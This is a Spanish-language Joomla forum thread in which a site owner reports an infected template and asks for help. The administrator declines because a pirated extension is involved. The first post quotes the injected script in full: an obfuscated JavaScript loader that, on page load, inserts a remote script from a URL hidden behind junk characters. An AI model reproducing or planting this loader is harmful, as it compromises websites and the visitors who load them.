Bienvenido, Invitado
Nombre de Usuario: Contraseña:

TEMA: Ayuda Urgente!!!

Ayuda Urgente!!! 6 años 9 meses antes #1928

• b0la0
  • Fuera de línea
  • Fresh Boarder
Hola a todos, soy novato en el tema de Joomla y necesito su ayuda urgente, tengo el siguiente problema, desarrolle una web en la ultima version de Joomla y todo funcionaba ok, hasta que de pronto, luego de acutalizar mi sitio, en cuanto a contenidos y algunos productos del virtuemart. al otro dia al entra al sitio me daba el siguiente error:

Parse error: syntax error, unexpected '<' in /home/mihost/template/index.php on line 90

Por ende no me cargaba el sitio y solo se veia el texto anterior.
Me puse a revisar el codigo de mi index.php en la linea 90 como indicaba el error, cuando me encuentro con el siguiente Scrip instalado en el codigo..

<script>/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p = document.createElement('script');H3qqea3ur6p.setAt tribute('type', 'text/javascript');H3qqea3ur6p.setAttribute('id', 'myscript1');H3qqea3ur6p.setAttribute('src', 'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@ .&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r# $#)t))@s#!#)a!l##e@(.))&r$!u!&)8(0$)@$8^#^@0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e^))&@-($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c !&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ''));H3qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea3ur6p);}} catch(e) {}</script>

Cuando lo elimine, CASI todo volvio a estar como antes, pude entrar al sitio, ver sus contenidos, ir al administrador, etc... Salvo por el pequeño detalle de que ese scrip, me instalo un ActiveX (que debo suponer es un virus o algo asi, ya que nunca quise configurar mi sitio para que instalara dicho archivo)... además despues conectame a través de Filezilla y darle mantención a otro sitios en Joomla, no se como, pero se volvio a meter el mismo SCRIP dentro de los index.php, tanto del public_html, como el de templates...

Que puedo hacer, necesito ayuda, ya que limpio los codigos y luego se vuelven a cargar solos..
Será una error de Joomla? Estare con un virus yo en mi PC?.. Porfa, que alguien me oriente...

De ante mano mis saludos cordiales y agradecimientos por ayudar.
El administrador ha desactivado la escritura pública.

Re:Ayuda Urgente!!! 6 años 9 meses antes #1929

• willin
  • Fuera de línea
  • Administrator
  • Cuidado! Ya no estoy solo...
  • Gracias recibidas 44
Estimado,

La plantilla que estás usando es original?, nos puedes indicar algún dominio donde ver tu sitio?

Atentos a tus comentarios, un cordial saludo,
Guillermo Bravo
Administrador
Foro Joomla Chile

Re:Ayuda Urgente!!! 6 años 9 meses antes #1930

• b0la0
  • Fuera de línea
  • Fresh Boarder
Hola Willim, gracias por responderme, sabes el template que estoy usando es gratis y lo he usado anteriormente y no me dio problemas, asi que descartaria esa opción, lo que si me parece raro es que solo me han causado problemas los sitios a los que accedi en los ultimos 4 días via FTP y especificamente 1 en donde uso el componente FrontPageSlideshow en una version NULL que pille por alli, que ojo tambien antes habia usado, pero que no me causo problemas... sere yo el del virus en mi PC..? debo eliminar todo en el Host antes de volver a subir Joomla y los sitios de respaldo?..
Gracias de ante mano y cualquier ayuda se agradece..

Re:Ayuda Urgente!!! 6 años 9 meses antes #1942

• willin
  • Fuera de línea
  • Administrator
  • Cuidado! Ya no estoy solo...
  • Gracias recibidas 44
Estimado,

En realidad te comento que como comunidad joomla no damos soporte en casos en que se esté utilizando algún componente o extensión pirata...

Si buscas alguna alternativa gratuita, con gusto te ayudaremos...

Recibe un cordial saludo,
Guillermo Bravo
Administrador
Foro Joomla Chile

Consulta 6 años 9 meses antes #1972

• Smartalimentos
  • Fuera de línea
  • Fresh Boarder
Hola estimado.

Usted me puede ayudar con algunas cosas de mi pagina web www.canecorso.cl o aconsejarme alguien que lo pueda hacer.

Muchas gracias.
Moderadores: FeDoo, willin, josecardenasvejar, danylocl, hector_scl, gonzacha
Tiempo de carga de la página: 0.269 segundos
Gracias a Foro Kunena